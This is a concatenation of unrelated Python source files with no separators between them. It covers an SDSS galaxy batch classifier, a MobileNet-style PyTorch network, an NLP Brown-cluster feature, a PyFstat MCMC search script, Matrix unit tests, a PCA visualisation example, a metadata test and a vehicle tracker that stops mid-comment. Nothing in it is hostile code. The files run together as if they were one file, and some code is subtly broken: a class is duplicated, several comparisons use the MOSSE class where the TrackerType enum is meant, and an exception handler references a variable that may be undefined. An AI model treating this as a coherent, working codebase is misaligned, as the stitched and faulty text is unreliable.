runlog.removeHandler(h) runlog.addHandler(fileHandler) runlog.info("Batch runner started!") sys.setrecursionlimit(10**6) def logFixFmt (fix, k=50) : """ Formats error messages for the run logger """ return 2*(k*"#" + '\n') + txwr(width=k).fill(text=fix) + '\n' + 2*(k*"#" + '\n') class Batch () : """ Class that loads the FITS data corresponding to a .csv file of SDSS objIDs and performs DAGN classification on them """ batchRoot = "Batches" def getBatch (batchName, bands=Galaxy.default_bands, rad=40, csv=None) : """ Class method to get a batch """ try : batch = Batch(batchName, (batchName + ".csv") if csv is None else csv, bands, rad) except (FileNotFoundError, ValueError) as e : print("Error initialising batch!") print("Kindly check the latest message in the logfile '{}' for a fix.".format( os.path.join(os.getcwd(), runLogPath) )) print("Abort!") batch = None finally : return batch ############################################################################################################# ############################################################################################################# def __prelude__ (self) : """ Sets up files and folders and checks for existence of folder indicated by attribute batchName and the 'csv' filename """ # To access fileHandler of the logger global fileHandler fileHandler.setFormatter(log.Formatter("%(levelname)s : RUN_INIT : %(asctime)s : %(message)s", datefmt='%m/%d/%Y %I:%M:%S %p')) # Checks if the batchRoot directory has been created at the root directory runlog.info("Checking environment for the new batch.") if not os.path.isdir(Batch.batchRoot) : runlog.critical("Data folder not found!\n\n{}".format(logFixFmt( "Please create a folder named 'Data' in the notebook directory and rerun!" ))) raise FileNotFoundError # Checks if batchName folder exists in batchRoot if not os.path.isdir(self.batchFold) : runlog.critical("Batch folder not found\n\n{}".format(logFixFmt( "Please create a folder for the batch at '{}' and rerun!".format(self.batchFold) ))) raise FileNotFoundError ###################################################################### # Checks if the .csv file exists. If the 'csv' argument is None, the # name of the .csv file is taken to be the same name as its containing # folder ###################################################################### if not os.path.exists(self.csvPath) : runlog.critical("Batch .csv file at path '{}' not found\n\n{}".format(self.batchFold, logFixFmt( "Please supply the name of the appropriate .csv file and rerun!" ))) raise FileNotFoundError ###################################################################### # Changing name of the run log fileHandler to reflect the batch it is # presently handling ###################################################################### runlog.info("Valid environment! Changing log format to handle batch '{}'".format(self.batchName)) fileHandler.setFormatter(log.Formatter("%(levelname)s : {} : %(asctime)s : %(message)s".format(self.batchName), datefmt='%m/%d/%Y %I:%M:%S %p')) # Ensures only one fileHandler exists for h in runlog.handlers : runlog.removeHandler(h) runlog.addHandler(fileHandler) ###################################################################### # Creates a /FITS folder in the batch folder where all the FITS files will # be stored ###################################################################### if not os.path.exists(self.fitsFold) : os.mkdir(self.fitsFold) runlog.info("Created FITS folder for batch") else : runlog.info("FITS folder for the batch already exists") if not os.path.isdir(self.resFold) : os.mkdir(self.resFold) runlog.info("Created results folder for batch") else : runlog.info("Results folder for the batch already exists") def __setLoggers__ (self) : """ Sets a logger to record the results as a .csv file Can do because logging module of Python is thread-safe """ def setLogger (csvpath, loggername, headerline, runlogtype) : """ Internal function to get the logger """ # Creating the .csv file for results writeHeader = False if os.path.exists(csvpath) else True logger = log.getLogger(loggername) logger.setLevel(log.INFO) fh = log.FileHandler(csvpath) fh.setFormatter(log.Formatter("%(message)s")) # Ensuring only one file handler exists for h in logger.handlers : logger.removeHandler(h) logger.addHandler(fh) if writeHeader : logger.info(headerline) runlog.info(f"Created {runlogtype} csv") else : runlog.info(f"{runlogtype} csv already exists") return logger self.reslog = setLogger(self.resCsvPath, self.batchName + "_result", "objid,u-type,u-peaks,g-type,g-peaks,r-type,r-peaks,i-type,i-peaks", "result" ) self.purelog = setLogger(self.pureCsvPath, self.batchName + "_pure", "objid,bands,pid1,pid2", "pure" ) self.impurelog = setLogger(self.impureCsvPath, self.batchName + "_impure", "objid,u-type,u-peaks,g-type,g-peaks,r-type,r-peaks,i-type,i-peaks", "impure" ) def __setBatchList__ (self) : """ Sets the list of galaxies to classify - 1. Reads the main .csv file 2. Reads the .csv file which contains results of already classified galaxies 3. The set difference of (1) and (2) are the galaxies yet to be classified """ # try block to read the master .csv file try : df = pd.read_csv(self.csvPath, dtype=object, usecols=["objid", "ra", "dec"]) except ValueError as e : runlog.critical("Invalid columns in .csv file\n\n{}".format(logFixFmt( "Please ensure columns 'objid', 'ra' and 'dec' are present in the .csv \ file (in that order) and rerun!" ))) raise e # try block to read the result .csv file try : resIDs = [] if not os.path.exists(self.resCsvPath) else\ list(pd.read_csv(self.resCsvPath, dtype=object)['objid']) except ValueError as e : runlog.critical("Error in loading result csv file\n\n{}".format(logFixFmt( "Please ensure the first column in 'objid'. If the file is corrupted, delete \ it and rerun!" ))) self.galaxies = [(str(objid), (ra, dec)) for objid, ra, dec in zip(df["objid"], df["ra"], df["dec"]) if str(objid) not in resIDs] def __init__ (self, batchName, csvName, bands, rad) : """ Constructor for the batch. Does the following - 1. Sets up the folders/environment for the batch 2. Sets the result logger for the batch in the batch folder 3. Reads in the batch .csv and the result .csv file and decides which objects remain to be classified """ self.batchName = batchName self.csvName = csvName self.__prelude__() runlog.info("Successfully created environment for batch") # Function to check if the band(s) supplied by the user is valid areBandsValid = lambda bs : len([b for b in bs if b in Galaxy.default_bands]) == len(bs) != 0 ###################################################################### # If the bands are not valid, a warning is logged # This is because the Galaxy object internally takes care of # invalid bands ###################################################################### if not areBandsValid(bands) : runlog.warning("One or more bands in '{}' invalid\n\n{}".format(bands, logFixFmt( "Please ensure that bands are a combination of 'ugri' only!" ))) raise ValueError("Invalid Band. Please use 'ugri'") self.bands = bands # Sets the result logger for the batch self.__setLoggers__() # Initialises the galaxy objects that are yet to be classified in this batch self.__setBatchList__() print("Batch successfully initialised. \ \nThe classifications will be available at {} \ \nIn the event of any program crash/error, please check the log file at {} for details"\ .format(self.resCsvPath, os.path.join(os.getcwd(), runLogPath))) print("Number of galaxies to classify - {}".format(len(self.galaxies))) def __str__ (self) : """ Batch object to string """ return self.csvPath def __len__ (self) : """ Length of the batch """ return len(self.galaxies) @property def batchFold (self) : """ Property attribute - Path of the batch folder """ return os.path.join (os.getcwd(), Batch.batchRoot, self.batchName) @property def fitsFold (self) : """ Property attribute - Path of the FITS folder for the batch """ return os.path.join (self.batchFold, "FITS") @property def resFold (self) : """ Property attribute - Path of the folder that contains result images post classificaton """ return os.path.join(self.batchFold, "Results") @property def csvPath (self) : """ Property attribute - Path of the csv File """ return os.path.join(self.batchFold, self.csvName) @property def resCsvPath (self) : """ Property attribute - Path of the result .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_result.csv") @property def pureCsvPath (self) : """ Property attribute - Path of the pure .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_pure_pids.csv") @property def impureCsvPath (self) : """ Property attribute - Path of the impure .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_impure.csv") @property def logPath (self) : """ Property attribute - Path of the log file for the batch """ return os.path.join(os.getcwd(), self.batchFold, "{}.log".format(self.batchName)) def classifyGal (self, args) : """ Performs the following for an argument 1. Download the FITS file if necessary 2. Read the FITS file and obtain the cutout 3. Smoothen the cutout data 3. Find the hull region where peak searching is done 4. Filter the bands in this galaxy where signal is unlikely to be found 5. Fit the intensity distribution to a light profile 6. Find the peaks using Stochastic Hill Climbing and DFS """ try : args += (self.fitsFold, self.bands) g = Galaxy(*args) g.download() runlog.info("{} --> Downloaded".format(g.objid)) g.cutout() runlog.info("{} --> Loaded and done cutout".format(g.objid)) g.smoothen() runlog.info("{} --> Smoothed".format(g.objid)) g.hullRegion() runlog.info("{} --> Found hull region".format(g.objid)) g.filter() runlog.info("{} --> Filtered".format(g.objid)) g.fitProfile() runlog.info("{} --> Fit intensity profile".format(g.objid)) g.setPeaks() runlog.info("{} --> Found peaks".format(g.objid)) ret = (g.csvLine(), g.progressLine()) csvLine, progressLine = ret purity, rep_band = pp.get_purity_band(g) if rep_band is not None : if purity : bands = pp.get_bands_csv (g, self.bands) pid1, pid2 = pp.peak_to_objid(g.cutouts[rep_band].wcs, g.peaks[rep_band].filtPeaks) self.purelog.info(f"{g.objid},{bands},{pid1},{pid2}") else : self.impurelog.info(csvLine) for b in g.bands : if len(g.peaks[b].filtPeaks) != 2 : continue img = g.getPeaksMarked(b, True) plt.imshow(img) plt.axis('off') plt.savefig(os.path.join(self.resFold, "{}-{}_result.png".format(g.objid, b)), bbox_inches='tight', pad_inches=0) plt.close() runlog.info("{} --> Results for manual impure classification".format(g.objid)) except Exception as e : runlog.info("{} --> ERROR : {}".format(g.objid, e)) ret = (str(g.objid) + 2*len(self.bands)*",ERROR", str(g.objid) + " -->" + len(self.bands)*" ERROR") g.delete() runlog.info("{} --> Deleted files".format(g.objid)) del g return ret def classifySerial (self) : self.gals = [] for i, args in enumerate(self.galaxies) : csvLine, progLine = self.classifyGal(args) self.reslog.info(csvLine) print("{}. {}".format(i+1, progLine)) import torch.nn as nn import math import torch import torch.nn.functional as F def conv_bn(inp, oup, stride, k_size=3): return nn.Sequential( nn.Conv2d(inp, oup, k_size, stride, 1, bias=False), nn.BatchNorm2d(oup), nn.PReLU() ) def conv_1x1_bn(inp, oup): return nn.Sequential( nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), nn.PReLU() ) class DWC(nn.Module): def __init__(self, in_channels, out_channels): super(DWC, self).__init__() #self.depthwise = nn.Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=(7,6), #stride=1, padding=0, groups=in_channels, bias=False) self.batch_norm_in = nn.BatchNorm2d(in_channels) self.depthwise = nn.AvgPool2d((7, 6), stride=1, padding=0) self.pointwise = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=1, padding=0, bias=False) def forward(self, x): x = self.depthwise(x) #x = self.batch_norm_in(x) x = self.pointwise(x) return x class Max_AvgPool(nn.Module): def __init__(self, kernel_size=(3,3), stride=2, padding=1, dim=128): super(Max_AvgPool, self).__init__() self.Maxpool = nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) self.Avgpool = nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def forward(self, x): x = self.Maxpool(x) + self.Avgpool(x) # add some channelwise gating? return x class Max_AvgPool(nn.Module): def __init__(self, kernel_size=(3,3), stride=2, padding=1, dim=128): super(Max_AvgPool, self).__init__() self.Maxpool = nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) self.Avgpool = nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def forward(self, x): x = self.Maxpool(x) + self.Avgpool(x) # add some channelwise gating? return x class gated_conv1x1(nn.Module): def __init__(self, inc=128, outc=128): super(gated_conv1x1, self).__init__() self.inp = int(inc/2) self.oup = int(outc/2) self.conv1x1_1 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=False) self.gate_1 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=True) self.conv1x1_2 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=False) self.gate_2 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=True) def forward(self, x): x_1 = x[:, :self.inp, :, :] x_2 = x[:, self.inp:, :, :] a_1 = self.conv1x1_1(x_1) g_1 = F.sigmoid(self.gate_1(x_1)) a_2 = self.conv1x1_2(x_2) g_2 = F.sigmoid(self.gate_2(x_2)) ret = torch.cat((a_1*g_1, a_2*g_2), 1) return ret class InvertedResidual_dwc(nn.Module): def __init__(self, inp, oup, stride, expand_ratio): super(InvertedResidual_dwc, self).__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(round(inp * expand_ratio)) self.use_res_connect = self.stride == 1 and inp == oup self.conv = [] if expand_ratio == 1: self.conv.append(nn.Conv2d(inp, hidden_dim, kernel_size=(3, 3), stride=stride, padding=1, groups=hidden_dim)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) #self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) else: #self.conv.append(gated_conv1x1(inc=inp,outc=hidden_dim)) self.conv.append(nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) self.conv.append(nn.Conv2d(hidden_dim, hidden_dim, kernel_size=(3, 3), stride=stride, padding=1, groups=hidden_dim)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) self.conv = nn.Sequential(*self.conv) def forward(self, x): if self.use_res_connect: return x + self.conv(x) else: return self.conv(x) class InvertedResidual(nn.Module): def __init__(self, inp, oup, stride, expand_ratio): super(InvertedResidual, self).__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(round(inp * expand_ratio)) self.use_res_connect = self.stride == 1 and inp == oup self.conv = [] if expand_ratio == 1: self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) else: #self.conv.append(gated_conv1x1(inc=inp,outc=hidden_dim)) self.conv.append(nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) self.conv = nn.Sequential(*self.conv) def forward(self, x): if self.use_res_connect: return x + self.conv(x) else: return self.conv(x) class Net(nn.Module): #mobileNet v2 def __init__(self, embedding_size=128, input_size=224, width_mult=1.): super(Net, self).__init__() block = InvertedResidual block_dwc = InvertedResidual_dwc input_channel = 64 last_channel = 256 interverted_residual_setting = [ # t, c, n, s [1, 64, 1, 1], # depthwise conv for first row [2, 64, 2, 1], [4, 64, 2, 2], [2, 64, 2, 1], [4, 64, 5, 1], [2, 64, 2, 2], [2, 64, 6, 2], ] # building first layer input_channel = int(input_channel * width_mult) self.last_channel = int(last_channel * width_mult) if width_mult > 1.0 else last_channel self.features = [conv_bn(3, input_channel, 2)] # building inverted residual cnt = 0 for t, c, n, s in interverted_residual_setting: output_channel = int(c * width_mult) for i in range(n): if cnt>1: if i == n - 1: # reduce the featuremap in the last. self.features.append(block_dwc(input_channel, output_channel, s, expand_ratio=t)) else: self.features.append(block_dwc(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel else: if i == n - 1: # reduce the featuremap in the last. self.features.append(block_dwc(input_channel, output_channel, s, expand_ratio=t)) else: self.features.append(block_dwc(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel cnt+=1 # building last several layers self.features.append(gated_conv1x1(input_channel, self.last_channel)) # make it nn.Sequential self.features_sequential = nn.Sequential(*self.features) # Global depthwise conv #self.GDCconv = DWC(self.last_channel, embedding_size) self._initialize_weights() def forward(self, x): x = self.features_sequential(x).view(-1, 256*4) return x def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) if m.bias is not None: m.bias.data.zero_() elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() elif isinstance(m, nn.Linear): n = m.weight.size(1) m.weight.data.normal_(0, 0.01) m.bias.data.zero_()__author__ = 'wenqihe' from abstract_feature import AbstractFeature from em_token_feature import get_lemma class EMBrownFeature(AbstractFeature): def __init__(self, brown_file): with open(brown_file) as f: self.len = [4, 8, 12, 20] self.mapping = {} for line in f: items = line.strip('\r\n').split('\t') self.mapping[items[1]] = items[0] def apply(self, sentence, mention, features): for i in xrange(mention.start,mention.end): word = get_lemma(sentence.tokens[i], sentence.pos[i]) if word in self.mapping: cluster = self.mapping[word] for l in self.len: if len(cluster) >= l: features.append('BROWN_%d_%s' % (l, cluster[0:l])) features.append('BROWN_ALL_%s' % cluster) pepCV/PyFstat1-10 #!/usr/bin/env python import pyfstat F0 = 30.0 F1 = -1e-10 F2 = 0 Alpha = 0.5 Delta = 1 minStartTime = 1000000000 maxStartTime = minStartTime + 200 * 86400 Tspan = maxStartTime - minStartTime tref = minStartTime DeltaF0 = 6e-7 DeltaF1 = 1e-13 theta_prior = { "F0": {"type": "unif", "lower": F0 - DeltaF0 / 2.0, "upper": F0 + DeltaF0 / 2.0}, "F1": {"type": "unif", "lower": F1 - DeltaF1 / 2.0, "upper": F1 + DeltaF1 / 2.0}, "F2": F2, "Alpha": Alpha, "Delta": Delta, "transient_tstart": minStartTime, "transient_duration": { "type": "halfnorm", "loc": 0.001 * Tspan, "scale": 0.5 * Tspan, }, } ntemps = 2 log10beta_min = -1 nwalkers = 100 nsteps = [100, 100] mcmc = pyfstat.MCMCTransientSearch( label="transient_search", outdir="data_l", sftfilepattern="data_l/*simulated_transient_signal*sft", theta_prior=theta_prior, tref=tref, minStartTime=minStartTime, maxStartTime=maxStartTime, nsteps=nsteps, nwalkers=nwalkers, ntemps=ntemps, log10beta_min=log10beta_min, transientWindowType="rect", ) mcmc.run() mcmc.plot_corner(label_offset=0.7) mcmc.print_summary() 1-10 """Test matrix.py.""" from random import randint import pytest from pyadt import Matrix @pytest.fixture def mock_matrix(): return Matrix(3, 3, 2) def test_build(mock_matrix): assert mock_matrix.size == (3, 3) assert mock_matrix[0, 0] == 2 def test_rows(mock_matrix): assert mock_matrix.rows == 3 def test_rows_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.rows = 10 def test_cols(mock_matrix): assert mock_matrix.cols == 3 def test_cols_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.cols = 10 def test_size(mock_matrix): assert mock_matrix.size == (3, 3) def test_size_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.size = (5, 5) def test_scale_by(mock_matrix): mock_matrix.scale_by(4) assert mock_matrix[randint(0, 2), randint(0, 2)] == 8 def test_transpose(): m = Matrix.from_list_of_lists([[1, 2, 3], [3, 4, 5]]) t = m.transpose() i = randint(0, 1) j = randint(0, 1) assert t.size == (3, 2) assert m[i, j] == t[j, i] def test_add(): m = Matrix(3, 3, 10) n = m.add(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 12 o = m + n assert o[randint(0, 2), randint(0, 2)] == 22 def test_subtract(): m = Matrix(3, 3, 10) n = m.subtract(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 8 o = m - n assert o[randint(0, 2), randint(0, 2)] == 2 def test_multiply(): m = Matrix(3, 3, 2) n = m.multiply(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 12 o = m * Matrix(3, 3, 2) assert o[randint(0, 2), randint(0, 2)] == 12 def test_from_list_of_lists(): m = Matrix.from_list_of_lists([[1, 2], [3, 4], [5, 6]]) assert m.size == (3, 2) """Generates some data from random gaussian blobs and renders it""" import matplotlib.pyplot as plt import matplotlib.colors as mcolors import pca3dvis.pcs as pcs import pca3dvis.worker as worker import numpy as np FEATURES = 10 """The embedded space of the generated data. Every later snapshot has one more feature just to see that doesn't hurt anything""" CLUSTERS = 5 """How many clusters are made in the embedding space""" SNAPSHOTS = 2 """How many "snapshots" we generate""" SAMPLES_PER_CLUST = 200 """How many samples in each cluster""" CLUST_STD = 0.2 """Standard deviation of each cluster""" DRAFT = True """If draft settings are used for the video (ie. lower quality, but faster)""" def gaus_ball(center: np.ndarray, std: int, num_samples: int): """Produces a gaussian ball with the given center and std deviation""" return ( np.random.randn(num_samples, center.shape[0]).astype(center.dtype) * std + center ) def _main(): # First generate some data! datas = [] for snap in range(SNAPSHOTS): # We are looping over each of the snapshots we have. Since we are # generating points randomly, these snapshots are meaningless, but # we will see how these points are rendered centers = np.random.uniform(-2, 2, (CLUSTERS, FEATURES + snap)) # Get a center for each cluster uniformly on a cube with sidelengths # 4 centered at the origin data = np.concatenate( tuple( gaus_ball(cent, CLUST_STD, SAMPLES_PER_CLUST) for cent in centers ), 0 ) # Sample 200 points from each cluster and append them to the data # (but faster) datas.append(data) lbls = np.concatenate( tuple( np.zeros((SAMPLES_PER_CLUST,), data.dtype) + i for i in range(CLUSTERS) ), 0 ) # Each cluster has its own label cmap = plt.get_cmap('Set1') markers = [ # An array with 1 marker for each point ( # The first marker np.ones(lbls.shape, dtype='bool'), # a mask containing every point { 'c': lbls, # color these points based on their label 'cmap': cmap, # to decide to color from the label, use the colormap 's': 20, # the points should be around 20px 'marker': 'o', # use a circle to represent these points 'norm': mcolors.Normalize(0, CLUSTERS - 1) # the smallest label is 0, largest is CLUSTERS-1 } ) ] proj = pcs.get_pc_trajectory(datas, lbls) # This performs linear dimensionality-reduction using principal component # analysis to get the three-dimensional points we can actually plot worker.generate( proj, # Plot the points we found markers, # use the markers we made earlier ['Gaussian Balls (1)', 'Gaussian Balls (2)'], # title the different slices as so 'out/examples/gaus_balls', # store the result in this folder DRAFT # determines if we should store low quality (if True) or high quality (if False) ) # That's it! if __name__ == '__main__': _main() tests/test_metadata.py import sys import pathlib import contextlib import tempfile import pytest import json import sxs from .conftest import shortest_metadata, shortest_metadata_txt def test_json_conversion(): with contextlib.redirect_stdout(None): sxs.load(shortest_metadata, download=True, cache=True) try: sxs.load(shortest_metadata_txt, download=True, cache=True) except ValueError: pass path_json = sxs.utilities.cached_path(shortest_metadata) path_txt = sxs.utilities.cached_path(shortest_metadata_txt) m = sxs.Metadata.from_txt_file(path_txt, cache_json=False) with tempfile.TemporaryDirectory() as temp_dir: temp_dir_path = pathlib.Path(temp_dir) temp_path = temp_dir_path / "metadata" m.to_json_file(temp_path) with path_json.open("r") as f1: m1 = json.load(f1) with temp_path.with_suffix(".json").open("r") as f2: m2 = json.load(f2) for key in m2: if key.startswith("reference_") or key.startswith("initial_"): assert m1[key] == m2[key] import enum import os from pathlib import Path from threading import Thread from time import time import math import dlib import cv2 from copy import deepcopy from Mosse_Tracker.Mosse import MOSSE from Mosse_Tracker.utils import draw_str from Mosse_Tracker.utils import RectSelector import sys, getopt from System.Data.CONSTANTS import Work_Tracker_Interpolation pi=22/7 global id id = 0 global frames frames = [] class TrackerType(enum.Enum): MOSSE = 1 DLIB = 2 class Tracker: def __init__(self, frame, cut_size, frame_width, frame_height, tracker_id =0, tracker_type = TrackerType.MOSSE): self.history = [] self.tracker_type = tracker_type xmin, ymin, xmax, ymax = cut_size self.width, self.height = map(cv2.getOptimalDFTSize, [xmax - xmin, ymax - ymin]) if tracker_type == TrackerType.MOSSE: self.tracker = MOSSE(frame, cut_size,learning_rate=0.225,psrGoodness=5) self.addHistory(self.tracker.getCutFramePosition()) else: xmin, ymin, xmax, ymax = cut_size self.tracker = dlib.correlation_tracker() self.tracker.start_track(frame, dlib.rectangle(int(xmin), int(ymin), int(xmax), int(ymax))) self.addHistory([xmin, ymin, xmax, ymax]) self.dx = [] self.dy = [] xmin, ymin, xmax, ymax = cut_size self.vehicle_width, self.vehicle_height = map(cv2.getOptimalDFTSize, [xmax - xmin, ymax - ymin]) self.frame_width =frame_width self.frame_height= frame_height self.tracker_id =tracker_id self.index = 0 self.avg_speed = [None]*30 self.estimationFutureCenter = [-1]*30 #add current cut frame in history for later use #only append the dimensins : [xmin,ymin,xmax,ymax] def addHistory(self,cut_size): self.history.append(cut_size) #get history in :[[xmin,ymin,xmax,ymax]] def getHistory(self): return self.history #update the tracker to current frame #also add the updated position to history def update(self, frame): if self.tracker_type == TrackerType.MOSSE: is_stopped = False if len(self.tracker.dx) >= 3 and Work_Tracker_Interpolation: if self.getAvgSpeed(len(self.tracker.dx)-3,len(self.tracker.dx)) < 20: is_stopped = True # print(self.getAvgSpeed(len(self.tracker.dx)-3,len(self.tracker.dx))) self.tracker.updateTracking(frame,is_stopped) self.addHistory(self.tracker.getCutFramePosition()) else: self.tracker.update(frame) if len(self.dx) == 0: self.dx.append(0) self.dy.append(0) else: x,y = self.get_position() xold,yold = self.get_position(self.history[-1]) dx, dy = x - xold, y - yold self.dx.append(dx) self.dy.append(dy) self.addHistory(self.getCutFramePosition(self.get_position())) return self.history[-1] #get last tracker position def getTrackerPosition(self): return self.history[-1] #only for dlib tracker def getCutFramePosition(self,center): if center == -1: center = self.center x = center[0] y = center[1] xmin = int(x - 0.5*(self.width-1)) ymin = int(y - 0.5*(self.height-1)) xmax = int(self.width+xmin) ymax = int(self.height+ymin) cut_size = [xmin,ymin,xmax,ymax] return cut_size #only for dlib tracker def get_position(self,cut_size = None): if cut_size == None: pos = self.tracker.get_position() xmin = int(pos.left()) ymin = int(pos.top()) xmax = int(pos.right()) ymax = int(pos.bottom()) else: xmin,ymin,xmax,ymax = cut_size x = int(xmin + 0.5*self.width) y = int(ymin + 0.5*self.height) return (x,y) #get dimensions of the history to be able to make video clip later def getTrackedFramesBoxed(self,last_no_of_frame = 0,after_no_of_frames = 1): xmin = self.history[-after_no_of_frames][0] ymin = self.history[-after_no_of_frames][1] xmax = self.history[-after_no_of_frames][2] ymax = self.history[-after_no_of_frames][3] num_of_frames = len(self.history) if last_no_of_frame != 0: num_of_frames = last_no_of_frame size = len(self.history) for i in range(size-2,size-num_of_frames-1,-1): position = self.history[i] if position[0] < xmin: xmin = position[0] if position[1] < ymin: ymin = position[1] if position[2] > xmax: xmax = position[2] if position[3] > ymax: ymax = position[3] xmin = int(max(xmin,0)) ymin = int(max(ymin,0)) xmax = int(min(xmax,self.frame_width)) ymax = int(min(ymax,self.frame_height)) return xmin,ymin,xmax,ymax def showFrame(self, frame): if self.tracker_type == TrackerType.MOSSE: (x, y) = self.tracker.getCenterOfTracker() xmin, ymin, xmax, ymax = self.tracker.getCutFramePosition() else: (x, y) = self.get_position() xmin, ymin, xmax, ymax = self.getCutFramePosition(self.get_position()) cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255)) if self.tracker_type == TrackerType.MOSSE: if self.tracker.isGood(): cv2.circle(frame, (int(x), int(y)), 2, (0, 0, 255), -1) else: cv2.line(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255)) cv2.line(frame, (xmax, ymin), (xmin, ymax), (0, 0, 255)) #draw_str(frame, (xmin, ymax + 16), 'Id: %i' % self.tracker_id) #draw_str(frame, (xmin, ymax + 32), 'PSR: %.2f' % self.tracker.getPsr()) # draw_str(frame, (xmin, ymax + 64), 'Max Speed: %.2f' % self.getMaxSpeed()) # draw_str(frame, (xmin, ymax + 80), 'Avg Speed: %.2f' % self.getAvgSpeed()) # draw_str(frame, (xmin, ymax + 96), 'Cur Speed: %.2f' % self.getCurrentSpeed()) # draw_str(frame, (xmin, ymax + 112), 'Area Size: %.2f' % self.getCarSizeCoefficient()) # draw_str(frame, (xmin, ymax + 128), 'Moving Angle: %.2f' % self.getCarAngle()) def clearHistory(self): self.history = [] def saveTracking(self,frames): new_frames,width,height,_,_,_,_ = self.getFramesOfTracking(frames) if new_frames == None: return out = cv2.VideoWriter('./track_videos/' + str(self.tracker_id) + ") " + str(self.index) + '.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (width, height)) size = len(new_frames) for i in range(size): out.write(new_frames[i]) print("tracker_id " + str(self.tracker_id) + " saved!") self.index+=1 out.release() def getMaxSpeed(self): if self.tracker_type == MOSSE: x = max(self.tracker.dx) y = max(self.tracker.dy) else: x = max(self.dx) y = max(self.dy) r = pow(pow(x,2)+pow(y,2),0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getAvgSpeed(self,from_frame_no = -1,to_frame_no = -1): if self.tracker_type == TrackerType.MOSSE: if from_frame_no == -1 or to_frame_no == -1: dx_change = self.tracker.dx dy_change = self.tracker.dy else: dx_change = self.tracker.dx[from_frame_no:to_frame_no] dy_change = self.tracker.dy[from_frame_no:to_frame_no] else: if from_frame_no == -1 or to_frame_no == -1: dx_change = self.dx dy_change = self.dy else: dx_change = self.dx[from_frame_no:to_frame_no] dy_change = self.dy[from_frame_no:to_frame_no] x = sum(dx_change)/len(dx_change) y = sum(dy_change)/len(dy_change) r = pow(pow(x, 2) + pow(y, 2), 0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getCurrentSpeed(self): if self.tracker_type == MOSSE: no_of_last_frames = min(len(self.tracker.dx),3) x = sum(self.tracker.dx[-no_of_last_frames:]) / no_of_last_frames y = sum(self.tracker.dy[-no_of_last_frames:]) / no_of_last_frames else: no_of_last_frames = min(len(self.dx),3) x = sum(self.dx[-no_of_last_frames:]) / no_of_last_frames y = sum(self.dy[-no_of_last_frames:]) / no_of_last_frames r = pow(pow(x, 2) + pow(y, 2), 0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getCarSizeCoefficient(self): # area = 0.5 * self.tracker.width * self.tracker.height if self.tracker_type == MOSSE: area = self.tracker.area else: area = self.width * self.height coefficient = 43200/area return coefficient def getCarAngle(self): if self.tracker_type == TrackerType.MOSSE: max_index_to_measure = min(1000,len(self.tracker.dx)) dx = sum(self.tracker.dx[:max_index_to_measure]) dy = sum(self.tracker.dy[:max_index_to_measure]) else: max_index_to_measure = min(1000, len(self.dx)) dx = sum(self.dx[:max_index_to_measure]) dy = sum(self.dy[:max_index_to_measure]) is_dx_sign_pos = True if dx < 0: is_dx_sign_pos = False is_dy_sign_pos = True if dy < 0: is_dy_sign_pos = False if dx == 0: if dy > 0: return 270 elif dy < 0: return 90 else: return -1 degree = math.degrees(math.atan(abs(dy/dx))) #remember the y coordinate min at the left up corner so flip the 